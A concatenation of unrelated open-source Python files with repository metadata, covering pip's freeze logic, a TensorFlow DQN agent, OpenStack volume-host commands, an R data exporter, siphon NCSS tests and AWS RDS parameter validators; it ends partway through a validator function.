ch_connectivity[ii, [ch_names.index(i) for i in neigbs]] = True
ch_connectivity = sparse.csr_matrix(ch_connectivity)
return ch_connectivity
| {
"content_hash": "3fbe9bace69339c686ce39efde68a68e",
"timestamp": "",
"source": "github",
"line_count": 736,
"max_line_length": 79,
"avg_line_length": 35.30434782608695,
"alnum_prop": 0.5447583128078818,
"repo_name": "andyh616/mne-python",
"id": "180bfffd24ed110cee84c64aa9c8c9f2c36668c7",
"size": "26294",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mne/channels/channels.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "3117"
},
{
"name": "PowerShell",
"bytes": "2988"
},
{
"name": "Python",
"bytes": "4245296"
},
{
"name": "Shell",
"bytes": "936"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import collections
import logging
import os
import re
import warnings
from pip._vendor import pkg_resources, six
from pip._vendor.packaging.utils import canonicalize_name
from pip._vendor.pkg_resources import RequirementParseError
from pip._internal.exceptions import InstallationError
from pip._internal.req import InstallRequirement
from pip._internal.req.req_file import COMMENT_RE
from pip._internal.utils.deprecation import RemovedInPip11Warning
from pip._internal.utils.misc import (
dist_is_editable, get_installed_distributions,
)
logger = logging.getLogger(__name__)
def freeze(
requirement=None,
find_links=None, local_only=None, user_only=None, skip_regex=None,
isolated=False,
wheel_cache=None,
exclude_editable=False,
skip=()):
find_links = find_links or []
skip_match = None
if skip_regex:
skip_match = re.compile(skip_regex).search
dependency_links = []
for dist in pkg_resources.working_set:
if dist.has_metadata('dependency_links.txt'):
dependency_links.extend(
dist.get_metadata_lines('dependency_links.txt')
)
for link in find_links:
if '#egg=' in link:
dependency_links.append(link)
for link in find_links:
yield '-f %s' % link
installations = {}
for dist in get_installed_distributions(local_only=local_only,
skip=(),
user_only=user_only):
try:
req = FrozenRequirement.from_dist(
dist,
dependency_links
)
except RequirementParseError:
logger.warning(
"Could not parse requirement: %s",
dist.project_name
)
continue
if exclude_editable and req.editable:
continue
installations[req.name] = req
if requirement:
# the options that don't get turned into an InstallRequirement
# should only be emitted once, even if the same option is in multiple
# requirements files, so we need to keep track of what has been emitted
# so that we don't emit it again if it's seen again
emitted_options = set()
# keep track of which files a requirement is in so that we can
# give an accurate warning if a requirement appears multiple times.
req_files = collections.defaultdict(list)
for req_file_path in requirement:
with open(req_file_path) as req_file:
for line in req_file:
if (not line.strip() or
line.strip().startswith('#') or
(skip_match and skip_match(line)) or
line.startswith((
'-r', '--requirement',
'-Z', '--always-unzip',
'-f', '--find-links',
'-i', '--index-url',
'--pre',
'--trusted-host',
'--process-dependency-links',
'--extra-index-url'))):
line = line.rstrip()
if line not in emitted_options:
emitted_options.add(line)
yield line
continue
if line.startswith('-e') or line.startswith('--editable'):
if line.startswith('-e'):
line = line[2:].strip()
else:
line = line[len('--editable'):].strip().lstrip('=')
line_req = InstallRequirement.from_editable(
line,
isolated=isolated,
wheel_cache=wheel_cache,
)
else:
line_req = InstallRequirement.from_line(
COMMENT_RE.sub('', line).strip(),
isolated=isolated,
wheel_cache=wheel_cache,
)
if not line_req.name:
logger.info(
"Skipping line in requirement file [%s] because "
"it's not clear what it would install: %s",
req_file_path, line.strip(),
)
logger.info(
" (add #egg=PackageName to the URL to avoid"
" this warning)"
)
elif line_req.name not in installations:
# either it's not installed, or it is installed
# but has been processed already
if not req_files[line_req.name]:
logger.warning(
"Requirement file [%s] contains %s, but that "
"package is not installed",
req_file_path,
COMMENT_RE.sub('', line).strip(),
)
else:
req_files[line_req.name].append(req_file_path)
else:
yield str(installations[line_req.name]).rstrip()
del installations[line_req.name]
req_files[line_req.name].append(req_file_path)
# Warn about requirements that were included multiple times (in a
# single requirements file or in different requirements files).
for name, files in six.iteritems(req_files):
if len(files) > 1:
logger.warning("Requirement %s included multiple times [%s]",
name, ', '.join(sorted(set(files))))
yield(
'## The following requirements were added by '
'pip freeze:'
)
for installation in sorted(
installations.values(), key=lambda x: x.name.lower()):
if canonicalize_name(installation.name) not in skip:
yield str(installation).rstrip()
class FrozenRequirement(object):
def __init__(self, name, req, editable, comments=()):
self.name = name
self.req = req
self.editable = editable
self.comments = comments
_rev_re = re.compile(r'-r(\d+)$')
_date_re = re.compile(r'-(20\d\d\d\d\d\d)$')
@classmethod
def from_dist(cls, dist, dependency_links):
location = os.path.normcase(os.path.abspath(dist.location))
comments = []
from pip._internal.vcs import vcs, get_src_requirement
if dist_is_editable(dist) and vcs.get_backend_name(location):
editable = True
try:
req = get_src_requirement(dist, location)
except InstallationError as exc:
logger.warning(
"Error when trying to get requirement for VCS system %s, "
"falling back to uneditable format", exc
)
req = None
if req is None:
logger.warning(
'Could not determine repository location of %s', location
)
comments.append(
'## !! Could not determine repository location'
)
req = dist.as_requirement()
editable = False
else:
editable = False
req = dist.as_requirement()
specs = req.specs
assert len(specs) == 1 and specs[0][0] in ["==", "==="], \
'Expected 1 spec with == or ===; specs = %r; dist = %r' % \
(specs, dist)
version = specs[0][1]
ver_match = cls._rev_re.search(version)
date_match = cls._date_re.search(version)
if ver_match or date_match:
svn_backend = vcs.get_backend('svn')
if svn_backend:
svn_location = svn_backend().get_location(
dist,
dependency_links,
)
if not svn_location:
logger.warning(
'Warning: cannot find svn location for %s', req,
)
comments.append(
'## FIXME: could not find svn URL in dependency_links '
'for this package:'
)
else:
warnings.warn(
"SVN editable detection based on dependency links "
"will be dropped in the future.",
RemovedInPip11Warning,
)
comments.append(
'# Installing as editable to satisfy requirement %s:' %
req
)
if ver_match:
rev = ver_match.group(1)
else:
rev = '{%s}' % date_match.group(1)
editable = True
req = '%s@%s#egg=%s' % (
svn_location,
rev,
cls.egg_name(dist)
)
return cls(dist.project_name, req, editable, comments)
@staticmethod
def egg_name(dist):
name = dist.egg_name()
match = re.search(r'-py\d\.\d$', name)
if match:
name = name[:match.start()]
return name
def __str__(self):
req = self.req
if self.editable:
req = '-e %s' % req
return '\n'.join(list(self.comments) + [str(req)]) + '\n'
| {
"content_hash": "55d44c880152e10f406cbc93c1cefdd5",
"timestamp": "",
"source": "github",
"line_count": 252,
"max_line_length": 79,
"avg_line_length": 39.78174603174603,
"alnum_prop": 0.4682294264339152,
"repo_name": "Microsoft/PTVS",
"id": "b6821c0e7eff728787beafdb016760c6ecee5b55",
"size": "10025",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "Python/Product/Miniconda/Miniconda3-x64/Lib/site-packages/pip/_internal/operations/freeze.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ASP",
"bytes": "109"
},
{
"name": "Batchfile",
"bytes": "10898"
},
{
"name": "C",
"bytes": "23236"
},
{
"name": "C#",
"bytes": "12235396"
},
{
"name": "C++",
"bytes": "212001"
},
{
"name": "CSS",
"bytes": "7025"
},
{
"name": "HTML",
"bytes": "34251"
},
{
"name": "JavaScript",
"bytes": "87257"
},
{
"name": "PowerShell",
"bytes": "44322"
},
{
"name": "Python",
"bytes": "847130"
},
{
"name": "Rich Text Format",
"bytes": "260880"
},
{
"name": "Smarty",
"bytes": "8156"
},
{
"name": "Tcl",
"bytes": "24968"
}
],
"symlink_target": ""
} |
''' DQNAgentClass.py: Class for Deep Q-network agent. Built based on the network
in DeepMind, Multi-agent RL in Sequential Social Dilemmas paper. '''
# Python imports.
import tensorflow as tf
import numpy as np
import random
# Other imports.
from simple_rl.agents.AgentClass import Agent
class DQNAgent(Agent):
NAME = "dqn-deep-mind"
def __init__(self, actions, name=NAME, learning_rate=1e-4, x_dim=210, y_dim=160, eps_start=1.0, eps_decay=0.0000001, eps_end=0.1, num_channels=3, should_train=True, from_checkpoint=None, player_id=1):
Agent.__init__(self, name=name, actions=[])
self.learning_rate = learning_rate
self.x_dim, self.y_dim = x_dim, y_dim
self.actions, self.num_actions = actions, len(actions)
self.hidden_layers = [32, 32]
self.num_channels = num_channels
self.eps_start, self.epsilon_decay, self.epsilon_end = eps_start, eps_decay, eps_end
self.should_train = should_train
self.reset()
# Parameters for updating target network.
tau = 0.001
# TODO: Update to support player_id > 2.
# NOTE: This is a bit of a hack to update the variables in the target
# network. It can be fixed by using scope and Tensorflow 1.4 which takes
# a scope argument in tf.trainable_variables().
if player_id == 2:
vs = tf.trainable_variables()
self.target_ops = update_target_graph(vs[len(vs)//2:], tau)
else:
self.target_ops = update_target_graph(tf.trainable_variables(), tau)
# Load model from a checkpoint
if not (from_checkpoint is None):
self.saver.restore(self.sess, from_checkpoint)
print('Restored model from checkpoint: {}'.format(from_checkpoint))
def act(self, state, reward):
'''
Args:
state (simple_rl.State)
reward (float)
Returns:
(str)
'''
# Training
if self.should_train and self.total_steps > 0 and self.total_steps % self.update_freq == 0:
s, a, r, s2, t = self.experience_buffer.sample(self.batch_size)
targetVals = self.targetQN.predict_target(self.sess, s2)
# Compute y-vals
y = np.zeros(self.batch_size)
for i in range(self.batch_size):
if t[i]:
y[i] = r[i]
else:
y[i] = r[i] + targetVals[i]
l = self.mainQN.train(self.sess, s, a, y)
if self.print_loss and (self.total_steps % self.print_every == 0):
print('Loss for step {}: {}'.format(self.total_steps, l))
update_target(self.target_ops, self.sess)
# Not Training (or after training)
if random.random() < self.epsilon:
action = np.random.choice(self.num_actions) # NOTE: Again assumes actions encoded as integers
else:
img = state.to_rgb(self.x_dim, self.y_dim)
action = self.mainQN.get_best_action(self.sess, img)[0]
if not (self.prev_state is None) and not (self.prev_action is None):
self.experience_buffer.add((self.prev_state, self.prev_action, reward, state.to_rgb(self.x_dim, self.y_dim), state.is_terminal()))
self.prev_state, self.prev_action = state.to_rgb(self.x_dim, self.y_dim), action
if self.epsilon > self.epsilon_end:
self.epsilon -= self.epsilon_decay
# Saving checkpoints (NOTE: We only save checkpoints when training)
if self.should_train and self.should_save and self.total_steps > 0 and self.total_steps % self.save_every == 0:
save_path = self.saver.save(self.sess, '/tmp/{}.ckpt'.format(self.name))
print('At step {}, saved model to {}'.format(self.total_steps, save_path))
self.curr_step += 1
self.total_steps += 1
if state.is_terminal():
self.curr_step = 0
self.curr_episode += 1
self.action_counts[action] += 1
return self.actions[action]
def __str__(self):
return str(self.name)
def reset(self):
self.mainQN = QNetwork(learning_rate=self.learning_rate, num_actions=self.num_actions, x_dim=self.x_dim, y_dim=self.y_dim, num_channels=self.num_channels)
self.targetQN = QNetwork(learning_rate=self.learning_rate, num_actions=self.num_actions, x_dim=self.x_dim, y_dim=self.y_dim, num_channels=self.num_channels)
self.sess = tf.Session()
self.experience_buffer = ExperienceBuffer(buffer_size=10e5)
self.epsilon = self.eps_start
self.prev_state, self.prev_action = None, None
self.curr_step, self.total_steps = 0, 0
self.curr_episode = 0
self.update_freq = 100
self.batch_size = 32
self.update_target = 100
self.should_save, self.save_every = True, 100000
self.print_loss, self.print_every = True, 10000
self.saver = tf.train.Saver()
self.action_counts = np.zeros(self.num_actions)
self.sess.run(tf.global_variables_initializer())
# --------------
# -- QNetwork --
# --------------
class QNetwork():
def __init__(self, learning_rate=1e-4, num_actions=8, x_dim=21, y_dim=16, num_channels=3):
self.learning_rate = learning_rate
self.num_channels = num_channels
self.hidden_layers = [32, 32]
self.num_actions = num_actions
self.x_dim, self.y_dim = x_dim, y_dim
self.num_channels = num_channels
self.image = tf.placeholder(tf.float32, shape=[None, self.x_dim, self.y_dim, self.num_channels], name='image')
self.targetQ = tf.placeholder(tf.float32, shape=[None], name='targetQ')
self.actions = tf.placeholder(tf.int32, shape=[None], name='actions')
self.out = self.setup_network(self.image)
self.predict = tf.argmax(self.out, 1)
self.loss_val = self.loss(self.out)
self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss_val)
def setup_network(self, inpt):
flattened_input = tf.reshape(inpt, [-1, self.num_channels*self.x_dim*self.y_dim])
curr_layer = flattened_input
for i, layer_size in enumerate(self.hidden_layers):
curr_layer = tf.layers.dense(curr_layer, units=layer_size, activation=tf.nn.relu)
return tf.layers.dense(curr_layer, units=self.num_actions)
def loss(self, output):
actions_onehot = tf.one_hot(self.actions, self.num_actions, dtype=tf.float32)
Q = tf.reduce_sum(actions_onehot * self.out, axis=1)
return tf.reduce_mean(tf.square(self.targetQ - Q))
def train(self, sess, s, a, y):
_, l = sess.run([self.train_op, self.loss_val], feed_dict={self.targetQ: y, self.image: s, self.actions: a})
return l
def predict_target(self, sess, states):
vals = sess.run(self.out, feed_dict={self.image: states})
return np.max(vals, axis=1)
def get_best_action(self, sess, img):
return sess.run(self.predict, feed_dict={self.image: [img]})
# -----------------------
# -- Experience Buffer --
# -----------------------
class ExperienceBuffer():
def __init__(self, buffer_size = 50000):
self.buffer = []
self.buffer_size = buffer_size
def add(self, experience):
if len(self.buffer) == self.buffer_size:
self.buffer.pop(0)
self.buffer.append(experience)
def sample(self, size):
indexes = np.random.randint(0, high=len(self.buffer), size=size)
s1 = [self.buffer[index][0] for index in indexes]
a = [self.buffer[index][1] for index in indexes]
r = [self.buffer[index][2] for index in indexes]
s2 = [self.buffer[index][3] for index in indexes]
t = [self.buffer[index][4] for index in indexes]
return [s1, a, r, s2, t]
# Used to update TF networks
def update_target_graph(tfVars,tau):
total_vars = len(tfVars)
op_holder = []
for idx,var in enumerate(tfVars[0:total_vars//2]):
op_holder.append(tfVars[idx+total_vars//2].assign((var.value()*tau) + ((1-tau)*tfVars[idx+total_vars//2].value())))
return op_holder
def update_target(op_holder,sess):
for op in op_holder:
sess.run(op)
| {
"content_hash": "6df7c0e307ec7ee69bc227fefde0de2c",
"timestamp": "",
"source": "github",
"line_count": 208,
"max_line_length": 205,
"avg_line_length": 39.70673076923077,
"alnum_prop": 0.6080639302579005,
"repo_name": "david-abel/simple_rl",
"id": "8a5e243f4c5c110538775c96c050d318ba57a7f8",
"size": "8259",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "simple_rl/agents/func_approx/DQNAgentClass.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "196326"
},
{
"name": "Python",
"bytes": "433150"
}
],
"symlink_target": ""
} |
"""Volume v2 host action implementations"""
from osc_lib.command import command
from openstackclient.i18n import _
class FailoverVolumeHost(command.Command):
_description = _("Failover volume host to different backend")
def get_parser(self, prog_name):
parser = super(FailoverVolumeHost, self).get_parser(prog_name)
parser.add_argument(
"host",
metavar="<host-name>",
help=_("Name of volume host")
)
parser.add_argument(
"--volume-backend",
metavar="<backend-id>",
required=True,
help=_("The ID of the volume backend replication "
"target where the host will failover to (required)")
)
return parser
def take_action(self, parsed_args):
service_client = self.app.client_manager.volume
service_client.services.failover_host(parsed_args.host,
parsed_args.volume_backend)
class SetVolumeHost(command.Command):
_description = _("Set volume host properties")
def get_parser(self, prog_name):
parser = super(SetVolumeHost, self).get_parser(prog_name)
parser.add_argument(
"host",
metavar="<host-name>",
help=_("Name of volume host")
)
enabled_group = parser.add_mutually_exclusive_group()
enabled_group.add_argument(
"--disable",
action="store_true",
help=_("Freeze and disable the specified volume host")
)
enabled_group.add_argument(
"--enable",
action="store_true",
help=_("Thaw and enable the specified volume host")
)
return parser
def take_action(self, parsed_args):
service_client = self.app.client_manager.volume
if parsed_args.enable:
service_client.services.thaw_host(parsed_args.host)
if parsed_args.disable:
service_client.services.freeze_host(parsed_args.host)
| {
"content_hash": "0cf813c3e256ee524922ba19f258ef5c",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 73,
"avg_line_length": 33.47540983606557,
"alnum_prop": 0.5861900097943193,
"repo_name": "openstack/python-openstackclient",
"id": "2fdeb9684b96812e010ac57c228dccc12ce9c067",
"size": "2610",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "openstackclient/volume/v2/volume_host.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "923"
},
{
"name": "Python",
"bytes": "5016301"
},
{
"name": "Shell",
"bytes": "299"
}
],
"symlink_target": ""
} |
from zipfile import ZipFile
from cStringIO import StringIO
from string import punctuation
from django.template import Context
from django.template.loader import get_template
from _base import BaseExporter
from _csv import CSVExporter
class RExporter(BaseExporter):
short_name = 'R'
long_name = 'R Programming Language'
file_extension = 'zip'
content_type = 'application/zip'
preferred_formats = ('r', 'coded')
def _format_name(self, name):
punc = punctuation.replace('_', '')
name = str(name).translate(None, punc)
name = name.replace(' ', '_')
words = name.split('_')
for i, w in enumerate(words):
if i == 0:
name = w.lower()
continue
name += w.capitalize()
if name[0].isdigit():
name = '_' + name
return name
def _code_values(self, var, coded_labels):
"If the field can be coded return the r factor and level for it."
data_field = u'data${0}'.format(var)
factor = u'{0}.factor = factor({0},levels=c('.format(data_field)
level = u'levels({0}.factor)=c('.format(data_field)
last = len(coded_labels) - 1
for i, (code, label) in enumerate(coded_labels):
factor += str(code)
level += u'"{0}"'.format(str(label))
# Do not apply on the final loop
if i < last:
factor += ' ,'
level += ' ,'
factor += '))\n'
level += ')\n'
return factor, level
def write(self, iterable, buff=None, template_name='export/script.R',
*args, **kwargs):
zip_file = ZipFile(self.get_file_obj(buff), 'w')
factors = [] # field names
levels = [] # value dictionaries
labels = [] # data labels
for f in self.header:
name = f['name']
labels.append(u'attr(data${0}, "label") = "{1}"'
.format(name, f['label']))
coded_labels = f['field'].coded_labels()
if coded_labels:
codes = self._code_values(name, f['field'], coded_labels)
factors.append(codes[0])
levels.append(codes[1])
data_filename = 'data.csv'
script_filename = 'script.R'
# File buffers
data_buff = StringIO()
# Create the data file with this exporter's preferred formats.
data_exporter = CSVExporter(self.concepts,
preferred_formats=self.preferred_formats)
# Write the data file.
data_exporter.write(iterable, data_buff, *args, **kwargs)
zip_file.writestr(data_filename, data_buff.getvalue())
template = get_template(template_name)
context = Context({
'data_filename': data_filename,
'labels': labels,
'factors': factors,
'levels': levels,
})
# Write script from template
zip_file.writestr(script_filename, template.render(context))
zip_file.close()
return zip_file
| {
"content_hash": "43163230ad8235cb2b2c69162f746b35",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 77,
"avg_line_length": 28.761467889908257,
"alnum_prop": 0.5400318979266348,
"repo_name": "murphyke/avocado",
"id": "12af63a9d730839259076282f9127ef2b30ba1aa",
"size": "3135",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "avocado/export/_r.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "HTML",
"bytes": "18009"
},
{
"name": "Makefile",
"bytes": "84"
},
{
"name": "Python",
"bytes": "1035156"
},
{
"name": "R",
"bytes": "273"
},
{
"name": "SAS",
"bytes": "689"
},
{
"name": "Shell",
"bytes": "2369"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from .models import Category, Thread, Post
admin.site.register(Category)
admin.site.register(Thread)
admin.site.register(Post)
| {
"content_hash": "8c88ff1301424b61c4bb1fd87d07992f",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 42,
"avg_line_length": 23.142857142857142,
"alnum_prop": 0.808641975308642,
"repo_name": "maur1th/naxos",
"id": "abf989f1c0dc6a52e0f1f6807bccc656e0e04fe3",
"size": "162",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "app/forum/forum/admin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "3190"
},
{
"name": "Dockerfile",
"bytes": "1231"
},
{
"name": "HTML",
"bytes": "130330"
},
{
"name": "JavaScript",
"bytes": "9078"
},
{
"name": "Python",
"bytes": "132947"
},
{
"name": "Shell",
"bytes": "458"
}
],
"symlink_target": ""
} |
"""Test NCSS access code."""
from contextlib import contextmanager
from datetime import datetime
import numpy as np
from siphon.ncss import NCSS, NCSSQuery, ResponseRegistry
import siphon.testing
recorder = siphon.testing.get_recorder(__file__)
def test_ncss_query_proj_box():
"""Test forming a query with a projected bounding box."""
nq = NCSSQuery().lonlat_point(1, 2).projection_box(-1, -2, -3, -4)
query = str(nq)
assert query.count('=') == 4
assert 'minx=-1' in query
assert 'maxx=-3' in query
assert 'miny=-2' in query
assert 'maxy=-4' in query
def test_ncss_query_vertical_level():
"""Test making a query with a vertical level."""
nq = NCSSQuery().vertical_level(50000)
assert str(nq) == 'vertCoord=50000'
def test_ncss_query_add_latlon():
"""Test query when requesting adding lon and lat."""
nq = NCSSQuery().add_lonlat(True)
assert str(nq) == 'addLatLon=True'
def test_ncss_query_strides():
"""Test making a query with strides."""
nq = NCSSQuery().strides(5, 10)
query = str(nq)
assert 'timeStride=5' in query
assert 'horizStride=10' in query
def test_ncss_query_accept():
"""Test making a query with an accept."""
nq = NCSSQuery().accept('csv')
assert str(nq) == 'accept=csv'
@contextmanager
def response_context():
"""Override the response handler registry for testing.
This way we can force unhandled cases.
"""
old_reg = siphon.ncss.response_handlers
siphon.ncss.response_handlers = ResponseRegistry()
yield siphon.ncss.response_handlers
siphon.ncss.response_handlers = old_reg
# For testing unit handling
def tuple_unit_handler(data, units=None):
"""Return data as a list, with units as necessary."""
return np.array(data).tolist(), units
class TestNCSS:
"""Test NCSS queries and response parsing."""
server = 'http://thredds.ucar.edu/thredds/ncss/'
url_path = 'grib/NCEP/GFS/Global_0p5deg/GFS_Global_0p5deg_20150612_1200.grib2'
@recorder.use_cassette('ncss_test_metadata')
def setup(self):
"""Set up for tests with a default valid query."""
dt = datetime(2015, 6, 12, 15, 0, 0)
self.ncss = NCSS(self.server + self.url_path)
self.nq = self.ncss.query().lonlat_point(-105, 40).time(dt)
self.nq.variables('Temperature_isobaric', 'Relative_humidity_isobaric')
def test_good_query(self):
"""Test that a good query is properly validated."""
assert self.ncss.validate_query(self.nq)
def test_bad_query(self):
"""Test that a query with an unknown variable is invalid."""
self.nq.variables('foo')
assert not self.ncss.validate_query(self.nq)
def test_empty_query(self):
"""Test that an empty query is invalid."""
query = self.ncss.query()
res = self.ncss.validate_query(query)
assert not res
assert not isinstance(res, set)
def test_bad_query_no_vars(self):
"""Test that a query without variables is invalid."""
self.nq.var.clear()
assert not self.ncss.validate_query(self.nq)
@recorder.use_cassette('ncss_gfs_xml_point')
def test_xml_point(self):
"""Test parsing XML point returns."""
self.nq.accept('xml')
xml_data = self.ncss.get_data(self.nq)
assert 'Temperature_isobaric' in xml_data
assert 'Relative_humidity_isobaric' in xml_data
assert xml_data['lat'][0] == 40
assert xml_data['lon'][0] == -105
@recorder.use_cassette('ncss_gfs_csv_point')
def test_csv_point(self):
"""Test parsing CSV point returns."""
self.nq.accept('csv')
csv_data = self.ncss.get_data(self.nq)
assert 'Temperature_isobaric' in csv_data
assert 'Relative_humidity_isobaric' in csv_data
assert csv_data['lat'][0] == 40
assert csv_data['lon'][0] == -105
@recorder.use_cassette('ncss_gfs_csv_point')
def test_unit_handler_csv(self):
"""Test unit-handling from CSV returns."""
self.nq.accept('csv')
self.ncss.unit_handler = tuple_unit_handler
csv_data = self.ncss.get_data(self.nq)
temp = csv_data['Temperature_isobaric']
assert len(temp) == 2
assert temp[1] == 'K'
relh = csv_data['Relative_humidity_isobaric']
assert len(relh) == 2
assert relh[1] == '%'
@recorder.use_cassette('ncss_gfs_xml_point')
def test_unit_handler_xml(self):
"""Test unit-handling from XML returns."""
self.nq.accept('xml')
self.ncss.unit_handler = tuple_unit_handler
xml_data = self.ncss.get_data(self.nq)
temp = xml_data['Temperature_isobaric']
assert len(temp) == 2
assert temp[1] == 'K'
relh = xml_data['Relative_humidity_isobaric']
assert len(relh) == 2
assert relh[1] == '%'
@recorder.use_cassette('ncss_gfs_netcdf_point')
def test_netcdf_point(self):
"""Test handling of netCDF point returns."""
self.nq.accept('netcdf')
nc = self.ncss.get_data(self.nq)
assert 'Temperature_isobaric' in nc.variables
assert 'Relative_humidity_isobaric' in nc.variables
assert nc.variables['latitude'][0] == 40
assert nc.variables['longitude'][0] == -105
@recorder.use_cassette('ncss_gfs_netcdf4_point')
def test_netcdf4_point(self):
"""Test handling of netCDF4 point returns."""
self.nq.accept('netcdf4')
nc = self.ncss.get_data(self.nq)
assert 'Temperature_isobaric' in nc.variables
assert 'Relative_humidity_isobaric' in nc.variables
assert nc.variables['latitude'][0] == 40
assert nc.variables['longitude'][0] == -105
@recorder.use_cassette('ncss_gfs_vertical_level')
def test_vertical_level(self):
"""Test data return from a single vertical level is correct."""
self.nq.accept('csv').vertical_level(50000)
csv_data = self.ncss.get_data(self.nq)
np.testing.assert_almost_equal(csv_data['Temperature_isobaric'], np.array([263.40]), 2)
@recorder.use_cassette('ncss_gfs_csv_point')
def test_raw_csv(self):
"""Test CSV point return from a GFS request."""
self.nq.accept('csv')
csv_data = self.ncss.get_data_raw(self.nq)
assert csv_data.startswith(b'date,lat')
@recorder.use_cassette('ncss_gfs_csv_point')
def test_unknown_mime(self):
"""Test handling of unknown mimetypes."""
self.nq.accept('csv')
with response_context():
csv_data = self.ncss.get_data(self.nq)
assert csv_data.startswith(b'date,lat')
| {
"content_hash": "b9fbcff14054feaecccd4721eb105264",
"timestamp": "",
"source": "github",
"line_count": 200,
"max_line_length": 95,
"avg_line_length": 33.315,
"alnum_prop": 0.6307969383160739,
"repo_name": "Unidata/siphon",
"id": "77e871fcb4c486a3b27aaafd6d56526fe3194042",
"size": "6809",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_ncss.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "355237"
}
],
"symlink_target": ""
} |
from django.shortcuts import render, redirect
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse
from django.utils.translation import ugettext as _
from django.core.mail import send_mail
from . import forms
def home(request):
"""
Navigates to the home page of the application.
**Context**
**Template**
:template:`home/index.html`
"""
context = {}
return render(request, 'index.html', context)
def workshop(request):
"""
Navigates to the home page of the application.
**Context**
**Template**
:template:`home/index.html`
"""
context = {}
return render(request, 'workshop.html', context)
@login_required
def submit_feedback(request):
if request.method == 'POST':
form = forms.SubmitFeedbackForm(request.POST)
if form.is_valid():
send_mail(
form.cleaned_data.get('feedback_reason'),
"Feedback sent from user: " + request.user.email + "\n" + form.cleaned_data.get('feedback'),
'admin@ceos-cube.org', [settings.ADMIN_EMAIL],
fail_silently=False)
form = forms.SubmitFeedbackForm()
form.cleaned_data = {}
form.add_error(None, 'Feedback was successfuly submitted. Thank you for your comments')
context = {'title': "Feedback", 'form': form, 'wide': True}
return render(request, 'submit_feedback.html', context)
else:
context = {'title': "Feedback", 'form': forms.SubmitFeedbackForm(), 'wide': True}
if request.GET:
next = request.GET.get('next', "/")
if request.user.is_authenticated():
return redirect(next)
context['next'] = next
return render(request, 'submit_feedback.html', context)
| {
"content_hash": "35b1e9a3025079f74d27e3c030323583",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 108,
"avg_line_length": 28.106060606060606,
"alnum_prop": 0.6226415094339622,
"repo_name": "ceos-seo/data_cube_ui",
"id": "c4d5d2a0fc1e59aebc4a7c294b5d9eec0e418e8e",
"size": "1855",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/pages/views.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "402543"
},
{
"name": "GLSL",
"bytes": "167522"
},
{
"name": "HTML",
"bytes": "8002318"
},
{
"name": "JavaScript",
"bytes": "46178533"
},
{
"name": "PHP",
"bytes": "28128"
},
{
"name": "PLSQL",
"bytes": "14578"
},
{
"name": "Python",
"bytes": "908507"
},
{
"name": "Shell",
"bytes": "21979"
},
{
"name": "TSQL",
"bytes": "31758"
}
],
"symlink_target": ""
} |
import re
from . import AWSHelperFn, AWSObject, AWSProperty, Ref
from .validators import boolean, network_port, integer, positive_integer
# Taken from:
# http://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_CreateDBInstance.html
VALID_STORAGE_TYPES = ('standard', 'gp2', 'io1')
VALID_DB_ENGINES = ('MySQL', 'oracle-se1', 'oracle-se', 'oracle-ee',
'sqlserver-ee', 'sqlserver-se', 'sqlserver-ex',
'sqlserver-web', 'postgres')
VALID_LICENSE_MODELS = ('license-included', 'bring-your-own-license',
'general-public-license')
def validate_iops(iops):
"""DBInstance Iops validation rules."""
iops = integer(iops)
if int(iops) < 1000:
raise ValueError("DBInstance Iops, if set, must be greater than 1000.")
if int(iops) > 10000:
raise ValueError("DBInstance Iops, if set, must be less than 10000.")
return iops
def validate_storage_type(storage_type):
"""Validate StorageType for DBInstance"""
if storage_type not in VALID_STORAGE_TYPES:
raise ValueError("DBInstance StorageType must be one of: %s" %
", ".join(VALID_STORAGE_TYPES))
return storage_type
def validate_engine(engine):
"""Validate database Engine for DBInstance """
if engine not in VALID_DB_ENGINES:
raise ValueError("DBInstance Engine must be one of: %s" %
", ".join(VALID_DB_ENGINES))
return engine
def validate_license_model(license_model):
"""Validate LicenseModel for DBInstance"""
if license_model not in VALID_LICENSE_MODELS:
raise ValueError("DBInstance LicenseModel must be one of: %s" %
", ".join(VALID_LICENSE_MODELS))
return license_model
def validate_backup_window(window):
"""Validate PreferredBackupWindow for DBInstance"""
hour = r'[01]?[0-9]|2[0-3]'
minute = r'[0-5][0-9]'
r = ("(?P<start_hour>%s):(?P<start_minute>%s)-"
"(?P<end_hour>%s):(?P<end_minute>%s)") % (hour, minute, hour, minute)
range_regex = re.compile(r)
m = range_regex.match(window)
if not m:
raise ValueError("DBInstance PreferredBackupWindow must be in the "
"format: hh24:mi-hh24:mi")
start_ts = (int(m.group('start_hour')) * 60) + int(m.group('start_minute'))
end_ts = (int(m.group('end_hour')) * 60) + int(m.group('end_minute'))
if abs(end_ts - start_ts) < 30:
raise ValueError("DBInstance PreferredBackupWindow must be at least "
"30 minutes long.")
return window
def validate_maintenance_window(window):
"""Validate PreferredMaintenanceWindow for DBInstance"""
